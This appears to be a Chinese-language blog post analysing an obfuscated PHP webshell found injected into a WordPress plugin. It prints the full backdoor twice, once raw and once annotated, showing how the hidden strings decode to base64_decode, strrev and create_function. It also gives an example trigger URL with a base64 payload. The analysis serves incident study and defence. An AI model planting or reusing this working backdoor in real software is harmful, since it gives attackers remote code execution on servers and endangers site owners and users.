PHP 安全之 webshell 分析

TELstatic發表於2019-12-02

簡介

webshell就是以aspphp、jsp或者cgi等網頁檔案形式存在的一種命令執行環境,也可以將其稱做為一種網頁後門。黑客在入侵了一個網站後,通常會將asp或php後門檔案與網站伺服器WEB目錄下正常的網頁檔案混在一起,然後就可以使用瀏覽器來訪問asp或者php後門,得到一個命令執行環境,以達到控制網站伺服器的目的。1

分析

2019年11月27日,WordPress 站點不能訪問,分析之後發現 WordPress 外掛 sodium_compat 被人加料,程式碼如下。暫時不清楚黑客是如何注入,被加料內容是一個典型的 webshell 網站後門,利用 php 的 create_function 和 base64_decode 函式,且使用了大量的字串處理來逃避 webshell 檢測。

原始碼

$ALpmKtOl8475 = "/jqsbr9ia654yug0ew1)*7dtp;m8lx_2fnvh3zo.ck(";

$kHTiDsnt7866 = "";

foreach([3,38,5,23] as $E){
   $kHTiDsnt7866 .= $ALpmKtOl8475[$E];
}

if(isset($_REQUEST /*IlrKKxaEyQYkVUUVAQbCmgexCXoxvTrWqZxLlUthFJqduXYQfOEmKNTKGadaSfRBShxfGLFeFWBpNsWfEfbqbOCqDwLWiKmAoIrTUVLuzCGVahNNWQrOmifqtmmmrJzS*/["$kHTiDsnt7866"])){
    $DDebczKe7430 = $_REQUEST /*IlrKKxaEyQYkVUUVAQbCmgexCXoxvTrWqZxLlUthFJqduXYQfOEmKNTKGadaSfRBShxfGLFeFWBpNsWfEfbqbOCqDwLWiKmAoIrTUVLuzCGVahNNWQrOmifqtmmmrJzS*/["$kHTiDsnt7866"];
    $EqHZGFsG5581 = "";
    $DmPqoAru8529 = "";

    /*BFqVBKdwHVucHDLSKCdwDiTVwngSbkntEQocQxHZWXqOHINzkwYNpFtIhaZOzZmlBugDZEeVeugTChJBDKMyUvNOMfLdQhewrsRxbevlgjPspZyWQsuBuFbokFrMaJQa*/

    foreach([4,8,3,16,9,11,30,22,16,40,38,22,16] as $E){
       $EqHZGFsG5581 .= $ALpmKtOl8475[$E];
    }

    /*bJvLXYFVbsskXlgKXtVZMihhCyROeEvZEuTsNlIYPVOwxQISXNpPYfiuOKkkcTUqbyksvSGuxRecSOetQBEaewcaSqwZTBmbrWvMYSwkZgnbggtoDJLEdgPaRpCiDDyg*/

    foreach([3,23,5,5,16,34] as $E){
       $DmPqoAru8529 .= $ALpmKtOl8475[$E];
    }

    /*BNAAulguuQqtnSBDkkMBWjwtJICKhYDEEYyHJYKXJSmfoXDkKeHSIGWguuvFFNCwBCphSfhTRoclivzmdsvCnwqmZAiVWVuHrAabUFyjSeLKWnoHqZdGNGDMxZODhxgl*/

    $E = $DmPqoAru8529('n'.'o'.'i'.'t'.''.''.''.''.'c'.'n'.'u'.''.''.'f'.''.''.'_'.''.''.''.'e'.'t'.'a'.'e'.''.''.''.''.'r'.'c');

    $E = $E("", $EqHZGFsG5581($DDebczKe7430));

    $E();
    exit();
}

解析

$ALpmKtOl8475 = "/jqsbr9ia654yug0ew1)*7dtp;m8lx_2fnvh3zo.ck(";

$kHTiDsnt7866 = "";

foreach([3,38,5,23] as $E){
   $kHTiDsnt7866 .= $ALpmKtOl8475[$E];
}

## $kHTiDsnt7866 => 字串 sort 接收注入程式碼用

## 過濾請求
if(isset($_REQUEST /*IlrKKxaEyQYkVUUVAQbCmgexCXoxvTrWqZxLlUthFJqduXYQfOEmKNTKGadaSfRBShxfGLFeFWBpNsWfEfbqbOCqDwLWiKmAoIrTUVLuzCGVahNNWQrOmifqtmmmrJzS*/["$kHTiDsnt7866"])){
    $DDebczKe7430 = $_REQUEST /*IlrKKxaEyQYkVUUVAQbCmgexCXoxvTrWqZxLlUthFJqduXYQfOEmKNTKGadaSfRBShxfGLFeFWBpNsWfEfbqbOCqDwLWiKmAoIrTUVLuzCGVahNNWQrOmifqtmmmrJzS*/["$kHTiDsnt7866"];
    $EqHZGFsG5581 = "";
    $DmPqoAru8529 = "";

    /*BFqVBKdwHVucHDLSKCdwDiTVwngSbkntEQocQxHZWXqOHINzkwYNpFtIhaZOzZmlBugDZEeVeugTChJBDKMyUvNOMfLdQhewrsRxbevlgjPspZyWQsuBuFbokFrMaJQa*/

    foreach([4,8,3,16,9,11,30,22,16,40,38,22,16] as $E){
       $EqHZGFsG5581 .= $ALpmKtOl8475[$E];
    }

## $EqHZGFsG5581 => 函式 base64_decode
    /*bJvLXYFVbsskXlgKXtVZMihhCyROeEvZEuTsNlIYPVOwxQISXNpPYfiuOKkkcTUqbyksvSGuxRecSOetQBEaewcaSqwZTBmbrWvMYSwkZgnbggtoDJLEdgPaRpCiDDyg*/

    foreach([3,23,5,5,16,34] as $E){
       $DmPqoAru8529 .= $ALpmKtOl8475[$E];
    }

## $DmPqoAru8529 => 函式 strrev
    /*BNAAulguuQqtnSBDkkMBWjwtJICKhYDEEYyHJYKXJSmfoXDkKeHSIGWguuvFFNCwBCphSfhTRoclivzmdsvCnwqmZAiVWVuHrAabUFyjSeLKWnoHqZdGNGDMxZODhxgl*/

    $E = $DmPqoAru8529('n'.'o'.'i'.'t'.''.''.''.''.'c'.'n'.'u'.''.''.'f'.''.''.'_'.''.''.''.'e'.'t'.'a'.'e'.''.''.''.''.'r'.'c');

    ## $E => create_function

    $E = $E("", $EqHZGFsG5581($DDebczKe7430));

    ## $DDebczKe7430 => 注入程式碼 base64_encode 值
    ## 示例 echo phpinfo(); base64 加密後得到 ZWNobyBwaHBpbmZvKCk7
    ## 請求 http://${wordpress.site}/wp-admin/wp-includes/sodium_compat/lib/constants.php?sort=ZWNobyBwaHBpbmZvKCk7 時會輸出 phpinfo 資訊,如果伺服器生產環境沒有關閉 exec,system 等函式,那麼後果不堪設想。

    $E();
    exit();
}

文獻引用

  1. 百度百科 webshell
本作品採用《CC 協議》,轉載必須註明作者和本文連結

Be the one you want to be.

相關文章